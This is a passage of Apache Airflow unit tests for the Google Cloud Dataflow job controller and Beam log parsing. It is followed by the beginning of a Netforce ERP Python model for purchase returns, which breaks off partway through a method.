list.assert_called_once_with(location=TEST_LOCATION, projectId=TEST_PROJECT)
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.list\
.return_value.execute.assert_called_once_with(num_retries=20)
# fmt: on
assert dataflow_job.get_jobs() == [job, job]
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_FAILED, "Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobStatus.JOB_STATE_CANCELLED, "Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobStatus.JOB_STATE_DRAINED, "Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobStatus.JOB_STATE_UPDATED, "Google Cloud Dataflow job name-2 was updated\\."),
(
DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN",
),
]
)
def test_dataflow_job_wait_for_multiple_jobs_and_one_in_terminal_state(self, state, exception_regex):
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list.return_value.
execute.return_value
) = {
"jobs": [
{
"id": "id-1", "name": "name-1",
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE
},
{
"id": "id-2", "name": "name-2",
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": state
}
]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
with pytest.raises(Exception, match=exception_regex):
dataflow_job.wait_for_done()
def test_dataflow_job_wait_for_multiple_jobs_and_streaming_jobs(self):
# fmt: off
mock_jobs_list = (
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list
)
mock_jobs_list.return_value.execute.return_value = {
"jobs": [
{
"id": "id-2",
"name": "name-2",
"currentState": DataflowJobStatus.JOB_STATE_RUNNING,
"type": DataflowJobType.JOB_TYPE_STREAMING
}
]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
dataflow_job.wait_for_done()
assert 1 == mock_jobs_list.call_count
def test_dataflow_job_wait_for_single_jobs(self):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE,
}
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.return_value.execute.return_value = job
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.wait_for_done()
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.assert_called_once_with(
jobId=TEST_JOB_ID,
location=TEST_LOCATION,
projectId=TEST_PROJECT
)
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.return_value.execute.assert_called_once_with(num_retries=20)
# fmt: on
assert dataflow_job.get_jobs() == [job]
def test_dataflow_job_is_job_running_with_no_job(self):
# fmt: off
mock_jobs_list = (
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list
)
mock_jobs_list.return_value.execute.return_value = {
"jobs": []
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
result = dataflow_job.is_job_running()
assert result is False
# fmt: off
@parameterized.expand([
# RUNNING
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, None, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, None, True),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, False, True),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, False, True),
# AWAITING STATE
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, False, True),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, False, True),
])
# fmt: on
def test_check_dataflow_job_state_wait_until_finished(
self, job_type, job_state, wait_until_finished, expected_result
):
job = {"id": "id-2", "name": "name-2", "type": job_type, "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
wait_until_finished=wait_until_finished,
)
result = dataflow_job._check_dataflow_job_state(job)
assert result == expected_result
# fmt: off
@parameterized.expand([
# RUNNING
(DataflowJobStatus.JOB_STATE_RUNNING, None, False),
(DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobStatus.JOB_STATE_RUNNING, False, True),
# AWAITING STATE
(DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobStatus.JOB_STATE_PENDING, False, True),
])
# fmt: on
def test_check_dataflow_job_state_without_job_type(self, job_state, wait_until_finished, expected_result):
job = {"id": "id-2", "name": "name-2", "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
wait_until_finished=wait_until_finished,
)
result = dataflow_job._check_dataflow_job_state(job)
assert result == expected_result
# fmt: off
@parameterized.expand([
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_FAILED,
"Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_FAILED,
"Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN"),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN"),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_CANCELLED,
"Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_CANCELLED,
"Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_DRAINED,
"Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_DRAINED,
"Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_UPDATED,
"Google Cloud Dataflow job name-2 was updated\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_UPDATED,
"Google Cloud Dataflow job name-2 was updated\\."),
])
# fmt: on
def test_check_dataflow_job_state_terminal_state(self, job_type, job_state, exception_regex):
job = {"id": "id-2", "name": "name-2", "type": job_type, "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
with pytest.raises(Exception, match=exception_regex):
dataflow_job._check_dataflow_job_state(job)
def test_dataflow_job_cancel_job(self):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_RUNNING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_PENDING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_QUEUED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DRAINING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_STOPPED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=0,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = mock_jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': 'JOB_STATE_CANCELLED'},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.timeout")
@mock.patch("time.sleep")
def test_dataflow_job_cancel_job_cancel_timeout(self, mock_sleep, mock_timeout):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=4,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
cancel_timeout=10,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = mock_jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': 'JOB_STATE_CANCELLED'},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
mock_sleep.assert_has_calls([mock.call(4), mock.call(4), mock.call(4)])
mock_timeout.assert_called_once_with(
seconds=10, error_message='Canceling jobs failed due to timeout (10s): test-job-id'
)
@parameterized.expand(
[
(False, "JOB_TYPE_BATCH", "JOB_STATE_CANCELLED"),
(False, "JOB_TYPE_STREAMING", "JOB_STATE_CANCELLED"),
(True, "JOB_TYPE_BATCH", "JOB_STATE_CANCELLED"),
(True, "JOB_TYPE_STREAMING", "JOB_STATE_DRAINED"),
]
)
def test_dataflow_job_cancel_or_drain_job(self, drain_pipeline, job_type, requested_state):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"currentState": DataflowJobStatus.JOB_STATE_RUNNING,
"type": job_type,
}
get_method = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.get
get_method.return_value.execute.return_value = job
# fmt: off
job_list_nest_method = (self.mock_dataflow
.projects.return_value.
locations.return_value.
jobs.return_value.list_next)
job_list_nest_method.return_value = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
drain_pipeline=drain_pipeline,
cancel_timeout=None,
)
dataflow_job.cancel()
get_method.assert_called_once_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_once_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': requested_state},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
mock_batch.execute.assert_called_once()
def test_dataflow_job_cancel_job_no_running_jobs(self):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DONE},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_UPDATED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DRAINED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_FAILED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=0,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_not_called()
mock_jobs.return_value.update.assert_not_called()
def test_fetch_list_job_messages_responses(self):
# fmt: off
mock_list = (
self.mock_dataflow
.projects.return_value
.locations.return_value
.jobs.return_value
.messages.return_value
.list
)
mock_list_next = (
self.mock_dataflow.
projects.return_value.
locations.return_value.
jobs.return_value
.messages.return_value
.list_next
)
# fmt: on
mock_list.return_value.execute.return_value = "response_1"
mock_list_next.return_value = None
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = list(jobs_controller._fetch_list_job_messages_responses(TEST_JOB_ID))
mock_list.assert_called_once_with(projectId=TEST_PROJECT, location=TEST_LOCATION, jobId=TEST_JOB_ID)
mock_list_next.assert_called_once_with(
previous_request=mock_list.return_value, previous_response="response_1"
)
assert result == ["response_1"]
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController._fetch_list_job_messages_responses'))
def test_fetch_job_messages_by_id(self, mock_fetch_responses):
mock_fetch_responses.return_value = iter(
[
{"jobMessages": ["message_1"]},
{"jobMessages": ["message_2"]},
]
)
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = jobs_controller.fetch_job_messages_by_id(TEST_JOB_ID)
mock_fetch_responses.assert_called_once_with(job_id=TEST_JOB_ID)
assert result == ['message_1', 'message_2']
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController._fetch_list_job_messages_responses'))
def test_fetch_job_autoscaling_events_by_id(self, mock_fetch_responses):
mock_fetch_responses.return_value = iter(
[
{"autoscalingEvents": ["event_1"]},
{"autoscalingEvents": ["event_2"]},
]
)
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = jobs_controller.fetch_job_autoscaling_events_by_id(TEST_JOB_ID)
mock_fetch_responses.assert_called_once_with(job_id=TEST_JOB_ID)
assert result == ['event_1', 'event_2']
APACHE_BEAM_V_2_14_0_JAVA_SDK_LOG = f""""\
Dataflow SDK version: 2.14.0
Jun 15, 2020 2:57:28 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/dataflow\
/jobsDetail/locations/europe-west3/jobs/{TEST_JOB_ID}?project=XXX
Submitted job: {TEST_JOB_ID}
Jun 15, 2020 2:57:28 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To cancel the job using the 'gcloud' tool, run:
> gcloud dataflow jobs --project=XXX cancel --region=europe-west3 {TEST_JOB_ID}
"""
APACHE_BEAM_V_2_22_0_JAVA_SDK_LOG = f""""\
INFO: Dataflow SDK version: 2.22.0
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/dataflow\
/jobs/europe-west3/{TEST_JOB_ID}?project=XXXX
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: Submitted job: {TEST_JOB_ID}
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To cancel the job using the 'gcloud' tool, run:
> gcloud dataflow jobs --project=XXX cancel --region=europe-west3 {TEST_JOB_ID}
"""
APACHE_BEAM_V_2_14_0_PYTHON_SDK_LOG = f""""\
INFO:root:Completed GCS upload to gs://test-dataflow-example/staging/start-python-job-local-5bcf3d71.\
1592286375.000962/apache_beam-2.14.0-cp37-cp37m-manylinux1_x86_64.whl in 0 seconds.
INFO:root:Create job: <Job
createTime: '2020-06-16T05:46:20.911857Z'
currentStateTime: '1970-01-01T00:00:00Z'
id: '{TEST_JOB_ID}'
location: 'us-central1'
name: 'start-python-job-local-5bcf3d71'
projectId: 'XXX'
stageStates: []
startTime: '2020-06-16T05:46:20.911857Z'
steps: []
tempFiles: []
type: TypeValueValuesEnum(JOB_TYPE_BATCH, 1)>
INFO:root:Created job with id: [{TEST_JOB_ID}]
INFO:root:To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/\
dataflow/jobsDetail/locations/us-central1/jobs/{TEST_JOB_ID}?project=XXX
"""
APACHE_BEAM_V_2_22_0_PYTHON_SDK_LOG = f""""\
INFO:apache_beam.runners.dataflow.internal.apiclient:Completed GCS upload to gs://test-dataflow-example/\
staging/start-python-job-local-5bcf3d71.1592286719.303624/apache_beam-2.22.0-cp37-cp37m-manylinux1_x86_64.whl\
in 1 seconds.
INFO:apache_beam.runners.dataflow.internal.apiclient:Create job: <Job
createTime: '2020-06-16T05:52:04.095216Z'
currentStateTime: '1970-01-01T00:00:00Z'
id: '{TEST_JOB_ID}'
location: 'us-central1'
name: 'start-python-job-local-5bcf3d71'
projectId: 'XXX'
stageStates: []
startTime: '2020-06-16T05:52:04.095216Z'
steps: []
tempFiles: []
type: TypeValueValuesEnum(JOB_TYPE_BATCH, 1)>
INFO:apache_beam.runners.dataflow.internal.apiclient:Created job with id: [{TEST_JOB_ID}]
INFO:apache_beam.runners.dataflow.internal.apiclient:Submitted job: {TEST_JOB_ID}
INFO:apache_beam.runners.dataflow.internal.apiclient:To access the Dataflow monitoring console, please \
navigate to https://console.cloud.google.com/dataflow/jobs/us-central1/{TEST_JOB_ID}?project=XXX
"""
class TestDataflow(unittest.TestCase):
@parameterized.expand(
[
(APACHE_BEAM_V_2_14_0_JAVA_SDK_LOG,),
(APACHE_BEAM_V_2_22_0_JAVA_SDK_LOG,),
(APACHE_BEAM_V_2_14_0_PYTHON_SDK_LOG,),
(APACHE_BEAM_V_2_22_0_PYTHON_SDK_LOG,),
],
name_func=lambda func, num, p: f"{func.__name__}_{num}",
)
def test_data_flow_valid_job_id(self, log):
echos = ";".join(f"echo {shlex.quote(line)}" for line in log.split("\n"))
cmd = ["bash", "-c", echos]
found_job_id = None
def callback(job_id):
nonlocal found_job_id
found_job_id = job_id
BeamCommandRunner(
cmd, process_line_callback=process_line_and_extract_dataflow_job_id_callback(callback)
).wait_for_done()
self.assertEqual(found_job_id, TEST_JOB_ID)
def test_data_flow_missing_job_id(self):
cmd = ['echo', 'unit testing']
found_job_id = None
def callback(job_id):
nonlocal found_job_id
found_job_id = job_id
BeamCommandRunner(
cmd, process_line_callback=process_line_and_extract_dataflow_job_id_callback(callback)
).wait_for_done()
self.assertEqual(found_job_id, None)
@mock.patch('airflow.providers.apache.beam.hooks.beam.BeamCommandRunner.log')
@mock.patch('subprocess.Popen')
@mock.patch('select.select')
def test_dataflow_wait_for_done_logging(self, mock_select, mock_popen, mock_logging):
mock_logging.info = MagicMock()
mock_logging.warning = MagicMock()
mock_proc = MagicMock()
mock_proc.stderr = MagicMock()
mock_proc.stderr.readlines = MagicMock(return_value=['test\n', 'error\n'])
mock_stderr_fd = MagicMock()
mock_proc.stderr.fileno = MagicMock(return_value=mock_stderr_fd)
mock_proc_poll = MagicMock()
mock_select.return_value = [[mock_stderr_fd]]
def poll_resp_error():
mock_proc.return_code = 1
return True
mock_proc_poll.side_effect = [None, poll_resp_error]
mock_proc.poll = mock_proc_poll
mock_popen.return_value = mock_proc
dataflow = BeamCommandRunner(['test', 'cmd'])
mock_logging.info.assert_called_once_with('Running command: %s', 'test cmd')
self.assertRaises(Exception, dataflow.wait_for_done)
|
|
# Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields, get_model
from netforce.utils import get_data_path
import time
from netforce.access import get_active_company, get_active_user, set_active_user
from . import utils
from decimal import Decimal
class PurchaseReturn(Model):
_name = "purchase.return"
_string = "Purchase Return"
_audit_log = True
_name_field = "number"
_multi_company = True
_key = ["company_id", "number"]
_fields = {
"number": fields.Char("Number", required=True, search=True),
"ref": fields.Char("Ref", search=True),
"contact_id": fields.Many2One("contact", "Supplier", required=True, search=True),
"date": fields.Date("Date", required=True, search=True),
"state": fields.Selection([("draft", "Draft"), ("confirmed", "Confirmed"), ("done", "Completed"), ("voided", "Voided")], "Status", required=True),
"lines": fields.One2Many("purchase.return.line", "order_id", "Lines"),
"amount_subtotal": fields.Decimal("Subtotal", function="get_amount", function_multi=True, store=True),
"amount_tax": fields.Decimal("Tax Amount", function="get_amount", function_multi=True, store=True),
"amount_total": fields.Decimal("Total", function="get_amount", function_multi=True, store=True),
"amount_total_cur": fields.Decimal("Total", function="get_amount", function_multi=True, store=True),
"amount_total_words": fields.Char("Total Words", function="get_amount_total_words"),
"currency_id": fields.Many2One("currency", "Currency", required=True),
"tax_type": fields.Selection([["tax_ex", "Tax Exclusive"], ["tax_in", "Tax Inclusive"], ["no_tax", "No Tax"]], "Tax Type", required=True),
"invoices": fields.One2Many("account.invoice", "related_id", "Credit Notes"),
"pickings": fields.Many2Many("stock.picking", "Stock Pickings", function="get_pickings"),
"is_delivered": fields.Boolean("Delivered", function="get_delivered"),
"is_paid": fields.Boolean("Paid", function="get_paid"),
"comments": fields.One2Many("message", "related_id", "Comments"),
"payment_terms": fields.Text("Payment Terms"),
"ship_term_id": fields.Many2One("ship.term", "Shipping Terms"),
"price_list_id": fields.Many2One("price.list", "Price List", condition=[["type", "=", "purchase"]]),
"documents": fields.One2Many("document", "related_id", "Documents"),
"company_id": fields.Many2One("company", "Company"),
"other_info": fields.Text("Other Info"),
"bill_address_id": fields.Many2One("address", "Billing Address"),
"ship_address_id": fields.Many2One("address", "Shipping Address"),
"sequence_id": fields.Many2One("sequence", "Number Sequence"),
"stock_moves": fields.One2Many("stock.move", "related_id", "Stock Movements"),
"agg_amount_total": fields.Decimal("Total Amount", agg_function=["sum", "amount_total"]),
"year": fields.Char("Year", sql_function=["year", "date"]),
"quarter": fields.Char("Quarter", sql_function=["quarter", "date"]),
"month": fields.Char("Month", sql_function=["month", "date"]),
"week": fields.Char("Week", sql_function=["week", "date"]),
"agg_amount_subtotal": fields.Decimal("Total Amount w/o Tax", agg_function=["sum", "amount_subtotal"]),
"user_id": fields.Many2One("base.user", "Owner", search=True),
"emails": fields.One2Many("email.message", "related_id", "Emails"),
"orig_purchase_id": fields.Many2One("purchase.order","Original Purchase Order"),
}
_order = "date desc,number desc"
def _get_number(self, context={}):
seq_id = get_model("sequence").find_sequence(type="purchase_return")
if not seq_id:
return None
while 1:
num = get_model("sequence").get_next_number(seq_id)
user_id = get_active_user()
set_active_user(1)
res = self.search([["number", "=", num]])
set_active_user(user_id)
if not res:
return num
get_model("sequence").increment_number(seq_id)
def _get_currency(self, context={}):
settings = get_model("settings").browse(1)
return settings.currency_id.id
_defaults = {
"state": "draft",
"date": lambda *a: time.strftime("%Y-%m-%d"),
"number": _get_number,
"currency_id": _get_currency,
"tax_type": "tax_ex",
"company_id": lambda *a: get_active_company(),
"user_id": lambda *a: get_active_user(),
}
def create(self, vals, **kw):
id = super(PurchaseReturn, self).create(vals, **kw)
self.function_store([id])
return id
def write(self, ids, vals, **kw):
super(PurchaseReturn, self).write(ids, vals, **kw)
self.function_store(ids)
def confirm(self, ids, context={}):
for obj in self.browse(ids):
if obj.state != "draft":
raise Exception("Invalid state")
for line in obj.lines:
prod = line.product_id
if prod and prod.type in ("stock", "consumable", "bundle") and not line.location_id:
raise Exception("Missing location for product %s" % prod.code)
obj.write({"state": "confirmed"})
obj.trigger("confirm")
def done(self, ids, context={}):
for obj in self.browse(ids):
if obj.state != "confirmed":
raise Exception("Invalid state")
obj.write({"state": "done"})
def reopen(self, ids, context={}):
for obj in self.browse(ids):
if obj.state != "done":
raise Exception("Invalid state")
obj.write({"state": "confirmed"})
def to_draft(self, ids, context={}):
for obj in self.browse(ids):
obj.write({"state": "draft"})
def get_amount(self, ids, context={}):
settings = get_model("settings").browse(1)
res = {}
for obj in self.browse(ids):
vals = {}
subtotal = 0
tax = 0
for line in obj.lines:
if line.tax_id:
line_tax = get_model("account.tax.rate").compute_tax(
line.tax_id.id, line.amount, tax_type=obj.tax_type)
else:
line_tax = 0
tax += line_tax
if obj.tax_type == "tax_in":
subtotal += line.amount - line_tax
else:
subtotal += line.amount
vals["amount_subtotal"] = subtotal
vals["amount_tax"] = tax
vals["amount_total"] = subtotal + tax
vals["amount_total_cur"] = get_model("currency").convert(
vals["amount_total"], obj.currency_id.id, settings.currency_id.id)
res[obj.id] = vals
return res
def get_qty_total(self, ids, context={}):
res = {}
for obj in self.browse(ids):
qty = sum([line.qty for line in obj.lines])
res[obj.id] = qty or 0
return res
def update_amounts(self, context):
data = context["data"]
data["amount_subtotal"] = 0
data["amount_tax"] = 0
tax_type = data["tax_type"]
for line in data["lines"]:
if not line:
continue
amt = Decimal(((line.get("qty") or 0) * (line.get("unit_price") or 0)) - (line.get("discount_amount") or 0))
line["amount"] = amt
tax_id = line.get("tax_id")
if tax_id:
tax = get_model("account.tax.rate").compute_tax(tax_id, amt, tax_type=tax_type)
data["amount_tax"] += tax
else:
tax = 0
if tax_type == "tax_in":
data["amount_subtotal"] += amt - tax
else:
data["amount_subtotal"] += amt
data["amount_total"] = data["amount_subtotal"] + data["amount_tax"]
return data
def onchange_product(self, context):
data = context["data"]
path = context["path"]
